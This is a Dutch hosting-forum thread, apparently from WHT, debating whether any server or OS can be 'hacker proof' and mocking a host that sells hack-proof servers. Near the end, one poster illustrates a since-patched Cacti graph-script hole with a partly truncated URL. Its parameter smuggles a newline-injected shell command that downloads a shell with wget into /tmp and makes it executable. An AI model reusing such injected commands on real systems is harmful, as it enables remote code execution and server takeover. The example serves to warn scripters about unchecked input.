Onder de hosters hier op WHT is zelf een die hacker proof servers aanbied.
Dat is dan toch vragen om.....
Afdrukvoorbeeld
Onder de hosters hier op WHT is zelf een die hacker proof servers aanbied.
Dat is dan toch vragen om.....
Ik vind dat krom gedacht. Er kan geen discussie/is geen discussie nodig omdat elk OS gebreken heeft? Je kan een geciviliseerde discussie hebben, mits iedere deelnemer alle argumenten onderbouwd en die van de tegenstander ter harte neemt (en weerlegt of mee akkoord gaat).Citaat:
Oorspronkelijk geplaatst door Paulewk
Op het Internet zijn, zoals ik al zei, te veel mensen die geen discussie kunnen voeren/de boel expres verzieken. En nog leuker: op het Internet is het zeer makkelijk bepaalde argumenten van de tegenstander te negeren (zoals ook in het artikel vertelt).
Sterker nog: dit topic is het bewijs dat er wel een discussie kan zijn. Hier wordt immers al zeer wijs vertelt dat de veiligheid af hangt van de beheerder/gebruiker. Maar ook van belang is het doel van het systeem: je stelt andere eisen aan een desktop systeem dan een webserver, en bepaald aan de hand daarvan je graad van beveiliging (op een shared webserver oid wil je normale gebruikers veel sterker beperken, terwijl op een desktop de gebruiker nog wel de vrijheid moet hebben bepaalde data naar binnen te halen bijv).
Vervolgens kan je het ook hebben over hoe makkelijk veiligheid die jíj wilt is te implementeren op eender welk OS. Samen met de gebruiksvriendelijkheid van het OS en of het doet wat je wilt dat het doet, kies je vervolgens je OS. Voor bedrijven kan dat vanwege de 'gebruiksvriendelijkheid' (medewerkers zijn er bekend mee, kan je beter zeggen) al snel Windows zijn. Voor jouw webserver kan je kiezen voor Linux door de beschikbaarheid van bepaalde software, je kennis van het beveiligen van die bak.
Als je met een bepaald doel voor ogen hebt, kan je heus wel bepalen welk OS veiliger is.
Jochem
Er bestaat geen hackerproof systeem, omdat je dan simpelweg gebruikers moet weren of zelfs installatie en gebruik van de meest eenvoudige scriptjes voor gebruikers moet managen.Citaat:
Oorspronkelijk geplaatst door mahel
Maar tot nu toe, is nog geen systeem dat wij actief beheren voor een klant gehacked (afkloppen) dus we maken het de hackers moeilijk genoeg om voor makkelijker te hacken alternatieven te kiezen.
Hacker proof KAN niet bestaan; alles wat door mensen gemaakt is, bevat fouten en is dus altijd hackbaar. De beste beveiliging die een mens kan verzinnen, kan door een slimmer mens worden gebroken. Je kan het gruwelijk moeilijk maken, maar onmogelijk is onmogelijk! Mensen die beweren dan hun systeem niet gehacked kan worden, zijn mensen waar je ver van weg moet blijven als het om beveiliging gaat, want die snappen er weinig van. Absoluut veilig en tegelijk ook nog bruikbaar, is onmogelijk.
De veiligheid van een systeem is grotendeels afhankelijk van de beheerder van dat systeem, daarnaast zijn de gebruikers ook altijd een groot risico. Bugs in het OS zelf zijn maar een (zeer) klein deel van het probleem.
Het hangt er ook helemaal vanaf waar het systeem voor bedoelt is; een desktop heeft volledig andere beveiligingseisen dan een server en windows servers hebben daarbij weer hele andere beveiligingen nodig dan linux/bsd servers (zonder hierbij dus de 1 beter te noemen dan de ander). Een windows expert zal een windows server dus ook duidelijk veel beter kunnen beveiligen dan een linux server; andersom geld precies hetzelfde, een linux expert zal een linux machine veel beter kunnen beveiligen dan een window server. Beveiliging is NOOIT absoluut, maar hangt ALTIJD van (zeer) veel factoren af. Aangezien je nooit met alle factoren rekening kunt houden, is 100% veilig DUS onmogelijk. Beveiliging is dus ook 1 van de moeilijkste dingen om GOED te doen. Het soort discussies as "OS 1 is veiliger dan OS 2" is dus ook per definitie een nutteloze discussie, want het OS zelf is maar een klein deel van de beveiling.
Overigens, voor de mensen die echt in beveiliging geinteresseert zijn, is het boek van Bruce Schneier: "Beyond fear", een echte aanrader. Hij legt daarin zeer goed uit hoe je een beveiligingssystem kan beoordelen op een manier waar je ook echt wat aan hebt. Zeker de moeie waard om eens te lezen!
http://www.easyracks.nl/index.php?p=producten/managedCitaat:
U wilt wel een eigen dedicated server, maar het beheren en onderhouden ervan laat u liever aan professionals over, zodat u altijd verzekerd bent van een veilige, hack-proof server? Uiteraard is dit mogelijk.
Jawel hoor hack proof maken kost zelfs maar 75 euro ;)
Natuurlijk snap ik ook dat dit niet bestaat, maar er zullen altijd mensen zijn die in zo`n verkoop praatje intrappen natuurlijk.
Bestaat wel, ze halen na installatie gewoon de netwerkkabel er vanaf :)Citaat:
Oorspronkelijk geplaatst door mahel
Laatste die zijn servers hacker proof durfde noemen was martijn bevelander, inkt van De Telegraaf was nog niet droog of hij lag plat :) vanwege onderhoud heette het..
Dan ben je nog steeds niet veilig, want de server staat ergens fysiek en daar kun je (met geweld) bij komen ;)Citaat:
Oorspronkelijk geplaatst door crazycoder
optimist :)Citaat:
Oorspronkelijk geplaatst door skunkah
realist :p
Zelfs al ze je de server helemaal uit en stop je 'm in een kluis en verstop je die kluis op de maan, dan nog is 'ie niet hackproof. De kans dat 'ie gehacked wordt is extreem klein, maar zal NOOIT nul zijn; met genoeg resources is het altijd mogelijk :-)
Is er niet een wet ofzo die het verbied om onjuiste reclame te maken? "Hack-proof" aanbieden is gewoon klanten bedriegen en dus slecht voor de hosting branche in z'n algemeen, persoonlijk zou ik het dus absoluut niet erg vinden als dat soort onzin verboden werd! :-)
Haha.. ook goed :) dacht eigenlijk dat je in het DC die server dan ook nog moet zien te vinden.. maar het is natuurlijk de enige zonder netwerkkabel :)Citaat:
Oorspronkelijk geplaatst door Jurian
Denk dat het er uiteindelijk op neer zal komen dat je moet proberen om de risico's zo klein mogelijk te maken.
Mijn nieuwe sport? Servers hacken!
En nee, niet servers hijacken om spam te sturen en data te wissen van derden, maar juist om de diverse exploits te onderzoeken en te zien waar het mis kan gaan.
Je zult er versteld van staan, hoe vindingrijk de diverse hackers zijn om op de meest vreemde manieren toch zaken op een server uit te voeren wat normaal niet mogelijk geacht wordt.
Natuurlijk is het zo dat er voor Windows met stip de meeste exploits beschikbaar zijn. De algemene conclusie hieruit is (en ik maak(te) me daar ook schuldig aan) is dat Windows het meest onveilige systeem is.
Maar is dat wel zo? Want met een markt aandeel van 95% zijn er ook beduidend meer hackers op juist dat platform actief dan welk ander platform dan ook.
Nu Apple met de Mac Intel is gekomen (ik heb er ook een), en het marktaandeel snel toeneemt, groeit het aantal bekende exploits voor de Mac ook explosief. Er zijn ook voor de iMac de laaste maanden een aantal grote security updates geweest, en dit zal niet ophouden.
Het grootste probleem met veiligheid is echter de gebruiker, en dus ook de scripter van een website. Die zouden zich bij ieder blok code moeten gaan afvragen wat de mogelijke risico's zijn bij het binnenkrijgen van verkeerde data.
Helaas gebeurt dit niet of nauwelijks. Er wordt ook makkelijk vanuit gegaan dat er geen foute data kan binnenkomen, maar de meest voorkomende exploits zijn juist gebaseerd op het injecteren van 'vreemde' gegevens in een script via een handmatige POST (bijv met perl) of gewoon op de URL.
Een leuk voorbeeld voor cacti bijvoorbeeld, die ik pas tegenkwam, is een 'lek' in het script om de grafieken te bekijken (deze is inmiddels gedicht):
ipv: http://domein.com/traffic/graph_imag...tart=167276762
doet men: http://domein.com/traffic/graph_imag...ph_start=%0acd /tmp; wget http://download een shell; chmod +x ...;%0a
Zie hoe simpel het kan zijn voor een hacker, als niet alle data goed wordt gecontrolleerd.
Dus, welk systeem is het veiligst? Die zonder stekker in het stopcontact :D
Veiligheid, jaja. Wat een geouwehoer over het ene OS dat vele malen veiliger zou zijn dan het andere. Het komt er uiteindelijk voornamelijk op neer hoeveel software je draait. Een keten is zo sterk als zijn zwakste schakel, des te meer software je op een OS draait, des te moeilijker het wordt om het geheel veiliger te houden. Daarom is een desktop doorgaans minder 'veilig' dan een server.
Bladibladi, useless discussion ;)